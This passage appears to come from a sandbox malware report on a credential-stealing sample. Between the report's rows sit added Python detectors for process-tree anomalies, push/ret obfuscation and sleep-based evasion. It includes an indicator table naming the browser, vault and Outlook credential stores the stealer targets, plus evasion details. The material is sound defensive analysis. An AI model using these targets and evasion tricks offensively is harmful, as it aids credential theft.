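    """A system32/SysWOW64 binary whose parent lives outside the system directories."""
    return (ev.image.lower().startswith(SYSTEM_DIRS)
            and not ev.parent_image.lower().startswith(SYSTEM_DIRS))


def analyze(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """pid -> reasons, for every record that trips at least one check."""
    findings: Dict[int, List[str]] = {}
    for ev in events:
        reasons = []
        if image_commandline_mismatch(ev):
            reasons.append("image/command-line mismatch")
        if system_binary_with_foreign_parent(ev):
            reasons.append("system binary with non-system parent")
        if reasons:
            findings[ev.pid] = reasons
    return findings


def chain(events: List[ProcEvent], pid: int) -> List[str]:
    """Walk ppid links from pid towards the root; stops at the first parent absent from the trace."""
    by_pid = {ev.pid: ev for ev in events}
    out = []
    while pid in by_pid:
        out.append(ntpath.basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return out


# Constructed records mirroring the report's process tree (pids/ppids assumed).
DROPPER = r"C:\Users\user\Desktop\Certificate 11-19AIS.exe"
FAKE_CHROME = (r"C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx"
               r"\auecFLppjswMvwfJiAu.exe")
SAMPLE_EVENTS = [
    ProcEvent(100, 1, DROPPER, '"' + DROPPER + '"', r"C:\Windows\explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\SysWOW64\svchost.exe", '"' + DROPPER + '"', DROPPER),
    ProcEvent(300, 0, FAKE_CHROME, '"' + FAKE_CHROME + '"', ""),  # parent not in the trace
    ProcEvent(400, 300, r"C:\Windows\SysWOW64\netbtugc.exe",
              r'"C:\Windows\SysWOW64\netbtugc.exe"', FAKE_CHROME),
    ProcEvent(500, 400, r"C:\Program Files\Mozilla Firefox\firefox.exe",
              r'"C:\Program Files\Mozilla Firefox\Firefox.exe"', r"C:\Windows\SysWOW64\netbtugc.exe"),
]

if __name__ == "__main__":
    for pid, reasons in analyze(SAMPLE_EVENTS).items():
        print(pid, " <- ".join(chain(SAMPLE_EVENTS, pid)), reasons)
```

Run as written it flags pid 200 (both checks) and pid 400 (foreign parent only); firefox.exe is not flagged because a browser is not a system binary, but its chain firefox.exe <- netbtugc.exe <- auecFLppjswMvwfJiAu.exe still shows who launched it. The basename comparison is deliberately case-insensitive because the report itself shows "firefox.exe" created as "Firefox.exe".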
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
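Taken together, the module loads in netbtugc.exe (winsqlite3.dll, vaultcli.dll, dpapi.dll), the read of the Firefox profiles.ini, the Outlook profile key and the Chromium "CREATE TABLE password_notes" schema string in its memory describe a credential harvester rather than a NetBT utility. The following is an added example, not Joe Sandbox code and not FormBook code: it maps such observations to credential-store capabilities and only calls a process a stealer when more than one distinct store is touched, because dpapi.dll, cryptbase.dll and even winsqlite3.dll are loaded by plenty of legitimate software. The indicator table, event shape and thresholds are the author's assumptions; the observed values are the ones in the report.

```python
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Set, Tuple

# (event kind, regex over the event value, "store: description"). Assumed mapping,
# not a Joe Sandbox rule set. The prefix before ':' names the credential store
# or mechanism; only entries listed in STORES count towards the verdict.
INDICATORS: List[Tuple[str, str, str]] = [
    ("module",   r"\bwinsqlite3\.dll$",                    "sqlite: read browser credential databases"),
    ("module",   r"\bvaultcli\.dll$",                      "vault: Windows Credential Manager access"),
    ("module",   r"\bdpapi\.dll$",                         "dpapi: CryptUnprotectData on stored secrets"),
    ("file",     r"\\mozilla\\firefox\\profiles\.ini$",     "firefox: profile enumeration"),
    ("file",     r"\\login data$",                         "chromium: Login Data database read"),
    ("registry", r"\\software\\microsoft\\office\\[\d.]+\\outlook\\profiles",
                                                           "outlook: mail profile credentials"),
    ("string",   r"create table (logins|password_notes)\b", "chromium: Login Data schema in memory"),
]
STORES = {"vault", "firefox", "chromium", "outlook"}


def credential_capabilities(events: Iterable[Tuple[str, str]]) -> Dict[str, List[str]]:
    """events: (kind, value) pairs. Returns capability label -> matching evidence values."""
    caps: Dict[str, List[str]] = defaultdict(list)
    for kind, value in events:
        for ind_kind, pattern, label in INDICATORS:
            if kind == ind_kind and re.search(pattern, value, re.IGNORECASE):
                caps[label].append(value)
    return dict(caps)


def targeted_stores(events: Iterable[Tuple[str, str]]) -> Set[str]:
    """Distinct credential stores for which any evidence was seen."""
    return {label.split(":")[0] for label in credential_capabilities(events)} & STORES


def is_credential_stealer(events: Iterable[Tuple[str, str]], min_stores: int = 2) -> bool:
    """Verdict: at least `min_stores` distinct stores touched (assumed threshold)."""
    return len(targeted_stores(events)) >= min_stores


# Constructed observations taken from the report's rows for netbtugc.exe.
OBSERVED = [
    ("module", r"C:\Windows\SysWOW64\wininet.dll"),
    ("module", r"C:\Windows\SysWOW64\winsqlite3.dll"),
    ("module", r"C:\Windows\SysWOW64\vaultcli.dll"),
    ("module", r"C:\Windows\SysWOW64\dpapi.dll"),
    ("file", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    ("registry", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\"),
    ("string", "CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, "
               "parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE "
               "DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, "
               "date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));"),
]
# Constructed benign baseline: a process that only uses DPAPI for its own settings.
BENIGN = [("module", r"C:\Windows\System32\dpapi.dll"), ("module", r"C:\Windows\System32\wininet.dll")]

if __name__ == "__main__":
    for label, evidence in credential_capabilities(OBSERVED).items():
        print(label, "<-", evidence[0][:60])
    print("stealer:", is_credential_stealer(OBSERVED), "benign:", is_credential_stealer(BENIGN))
```

The Firefox row is worth a second look when triaging: the report attributes the profiles.ini read to firefox.exe, which netbtugc.exe launched, so the Firefox profile access happens through a browser instance the stealer started rather than by the stealer's own file reads; a detection keyed on the reader's image name would miss it.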
            Source: Certificate 11-19AIS.exe | Static file information: File size 1203200 > 1048576
            Source: Certificate 11-19AIS.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Certificate 11-19AIS.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Certificate 11-19AIS.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Certificate 11-19AIS.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Certificate 11-19AIS.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Certificate 11-19AIS.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Certificate 11-19AIS.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: auecFLppjswMvwfJiAu.exe, 00000003.00000000.1382456164.00000000003FE000.00000002.00000001.01000000.00000004.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000000.1529575482.00000000003FE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Certificate 11-19AIS.exe, 00000000.00000003.1315329322.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Certificate 11-19AIS.exe, 00000000.00000003.1314245805.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1456858379.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1456858379.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1368323882.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366408522.0000000003000000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1456803853.0000000002C22000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1458980834.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3780872271.0000000002F80000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3780872271.000000000311E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Certificate 11-19AIS.exe, 00000000.00000003.1315329322.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, Certificate 11-19AIS.exe, 00000000.00000003.1314245805.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1456858379.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1456858379.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1368323882.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1366408522.0000000003000000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.1456803853.0000000002C22000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1458980834.0000000002DD6000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3780872271.0000000002F80000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3780872271.000000000311E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.1425546855.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1456562010.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000003.00000003.1395481135.00000000009AB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.3782139985.00000000035AC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3776112621.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.000000000337C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1758230553.0000000006A1C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.3782139985.00000000035AC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3776112621.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.000000000337C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1758230553.0000000006A1C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.1425546855.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1456562010.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000003.00000003.1395481135.00000000009AB000.00000004.00000001.00020000.00000000.sdmp
            Source: Certificate 11-19AIS.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Certificate 11-19AIS.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Certificate 11-19AIS.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Certificate 11-19AIS.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Certificate 11-19AIS.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007CE01E LoadLibraryA,GetProcAddress, 0_2_007CE01E
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007D6B05 push ecx; ret 0_2_007D6B18
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004048A9 push esp; ret 2_2_004048AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E2BA push 00000038h; iretd 2_2_0041E2BE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A436 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418C92 pushad ; retf 2_2_00418C93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A5D9 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004017E5 push ebp; retf 003Fh 2_2_004017E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403780 push eax; ret 2_2_00403782
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004147A2 push es; iretd 2_2_004147AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0340225F pushad ; ret 2_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034027FA pushad ; ret 2_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx 2_2_034309B6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0340283D push eax; iretd 2_2_03402858
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0340135E push eax; iretd 2_2_03401369
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02F8225F pushad ; ret 4_2_02F827F9
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02F827FA pushad ; ret 4_2_02F827F9
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02F8283D push eax; iretd 4_2_02F82858
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02FB09AD push ecx; mov dword ptr [esp], ecx 4_2_02FB09B6
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02F81368 push eax; iretd 4_2_02F81369
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02830CE1 pushfd ; retf 4_2_02830D0B
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02822238 pushad ; iretd 4_2_02822239
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0282AB37 push 00000038h; iretd 4_2_0282AB3B
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02820EAB push ebp; retf 4_2_02820EAC
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02826E56 push ebx; iretd 4_2_02826E7D
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02826CB3 push ebx; iretd 4_2_02826E7D
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0282101F push es; iretd 4_2_02821027
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0282D1B0 push es; ret 4_2_0282D1D0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02811126 push esp; ret 4_2_02811127
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0282550F pushad ; retf 4_2_02825510
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0281FFA0 push esi; iretd 4_2_0281FFA5
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E0429A push cs; retf 4_2_02E042F6
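The "push x; ret / retf / iretd" rows above are the sandbox's obfuscated-control-flow heuristic: a push immediately followed by a return transfers control through the stack instead of a visible jump or call, which is how packers and injected FormBook stages hide their real edges from a disassembler. The following is an added example, not Joe Sandbox's scanner: a sliding-window byte scan that recognises the push-family opcodes (push r32, pushad, pushfd, segment pushes, push imm8/imm32) followed by a ret-family opcode (ret, ret imm16, retf, retf imm16, iretd), run over a constructed buffer that reproduces several of the sequences the report lists. Opcode tables and the sample bytes are the author's; only the mnemonics are taken from the report.

```python
from typing import List, Optional, Tuple

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# One-byte push forms: opcode -> mnemonic (push r32 is 0x50 + register index).
PUSH1 = {0x60: "pushad", 0x9C: "pushfd", 0x06: "push es", 0x0E: "push cs",
         0x16: "push ss", 0x1E: "push ds"}
PUSH1.update({0x50 + i: f"push {r}" for i, r in enumerate(REG32)})


def decode_push(code: bytes, i: int) -> Optional[Tuple[int, str]]:
    """(length, mnemonic) if code[i:] starts with a push-family instruction."""
    op = code[i]
    if op in PUSH1:
        return 1, PUSH1[op]
    if op == 0x6A and i + 1 < len(code):           # push imm8
        return 2, f"push {code[i + 1]:02X}h"
    if op == 0x68 and i + 4 < len(code):           # push imm32
        return 5, f"push {int.from_bytes(code[i + 1:i + 5], 'little'):08X}h"
    return None


def decode_ret(code: bytes, i: int) -> Optional[str]:
    """Mnemonic if code[i:] starts with a ret-family instruction."""
    if i >= len(code):
        return None
    op = code[i]
    if op == 0xC3:
        return "ret"
    if op == 0xCB:
        return "retf"
    if op == 0xCF:
        return "iretd"
    if op in (0xC2, 0xCA) and i + 2 < len(code):   # ret imm16 / retf imm16
        imm = int.from_bytes(code[i + 1:i + 3], "little")
        return f"{'ret' if op == 0xC2 else 'retf'} {imm:04X}h"
    return None


def find_push_ret(code: bytes, base: int = 0) -> List[Tuple[int, str]]:
    """Every offset (as base + offset) where a push is directly followed by a return."""
    hits = []
    for i in range(len(code)):
        push = decode_push(code, i)
        if push is None:
            continue
        length, push_txt = push
        ret = decode_ret(code, i + length)
        if ret is not None:
            hits.append((base + i, f"{push_txt}; {ret}"))
    return hits


# Constructed buffer: an ordinary prologue followed by sequences from the report.
SAMPLE = bytes([
    0x55, 0x8B, 0xEC,         # push ebp; mov ebp, esp   (normal, not reported)
    0x54, 0xC3,               # push esp; ret
    0x6A, 0x38, 0xCF,         # push 38h; iretd
    0x55, 0xCA, 0x3F, 0x00,   # push ebp; retf 003Fh
    0x60, 0xC3,               # pushad; ret
    0x06, 0xCF,               # push es; iretd
    0x90,                     # nop
])

if __name__ == "__main__":
    for addr, text in find_push_ret(SAMPLE, 0x401000):
        print(f"{addr:08X}  {text}")
```

Two caveats when applying this to a real dump: a linear scan over every byte offset will also fire inside data and inside the middle of longer instructions, so restrict it to executable regions (the report's hits at 0x0340xxxx and 0x02F8xxxx lie outside the svchost.exe and netbtugc.exe images, in the same regions the FormBook YARA rule matched); and the "push ecx; mov dword ptr [esp], ecx" rows are a common compiler idiom for reserving a stack slot, not a control transfer, so the scanner above deliberately does not report them.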
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_00818111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00818111
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007CEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_007CEB42
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007D123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_007D123A
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | API/Special instruction interceptor: Address: EF38FC
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFEFE52D324
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFEFE52D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFEFE52D944
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFEFE52D504
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFEFE52D544
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFEFE52D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFEFE530154
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFEFE52DA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0347096E rdtsc 2_2_0347096E
            Source: C:\Windows\SysWOW64\netbtugc.exe | Window / User API: threadDelayed 3972
            Source: C:\Windows\SysWOW64\netbtugc.exe | Window / User API: threadDelayed 6000
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Evaded block: after key decision | graph_0-95271
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Evaded block: after key decision | graph_0-94194
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | API coverage: 4.5 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe | API coverage: 2.6 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8128 | Thread sleep count: 3972 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8128 | Thread sleep time: -7944000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8128 | Thread sleep count: 6000 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 8128 | Thread sleep time: -12000000s >= -30000s
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe TID: 8180 | Thread sleep time: -75000s >= -30000s
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe TID: 8180 | Thread sleep time: -35000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exe | Last function: Thread delayed
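The sleep rows for netbtugc.exe thread 8128 pair a count (3972, then 6000) with a total (7944000, then 12000000); 3972 x 2000 = 7944000 and 6000 x 2000 = 12000000, which is consistent with a loop of 2000-unit delays rather than a single long sleep, the pattern malware uses to burn sandbox time without tripping a "one huge Sleep" check and without letting sleep-skipping shorten a single call. The following is an added example, not Joe Sandbox's signature: it aggregates delay calls per thread from constructed trace lines and applies the two comparisons the report prints (count > 30, total >= 30000). Treating the report's figures as milliseconds and the "tid api ms" line format are the author's assumptions.

```python
from collections import defaultdict
from typing import Dict, Iterable, List, NamedTuple


class SleepStats(NamedTuple):
    count: int      # number of delay calls on this thread
    total_ms: int   # sum of requested delays
    max_ms: int     # longest single delay


# Thresholds copied from the report's two comparisons; units assumed to be ms.
MAX_CALLS = 30
MAX_TOTAL_MS = 30_000
DELAY_APIS = {"Sleep", "SleepEx", "NtDelayExecution"}


def parse_trace(lines: Iterable[str]) -> Dict[int, SleepStats]:
    """Aggregate per-thread delay statistics from 'tid api ms' records (assumed format)."""
    count: Dict[int, int] = defaultdict(int)
    total: Dict[int, int] = defaultdict(int)
    longest: Dict[int, int] = defaultdict(int)
    for line in lines:
        parts = line.split()
        if len(parts) != 3 or parts[1] not in DELAY_APIS:
            continue                      # ignore malformed lines and other APIs
        tid, ms = int(parts[0]), int(parts[2])
        count[tid] += 1
        total[tid] += ms
        longest[tid] = max(longest[tid], ms)
    return {tid: SleepStats(count[tid], total[tid], longest[tid]) for tid in count}


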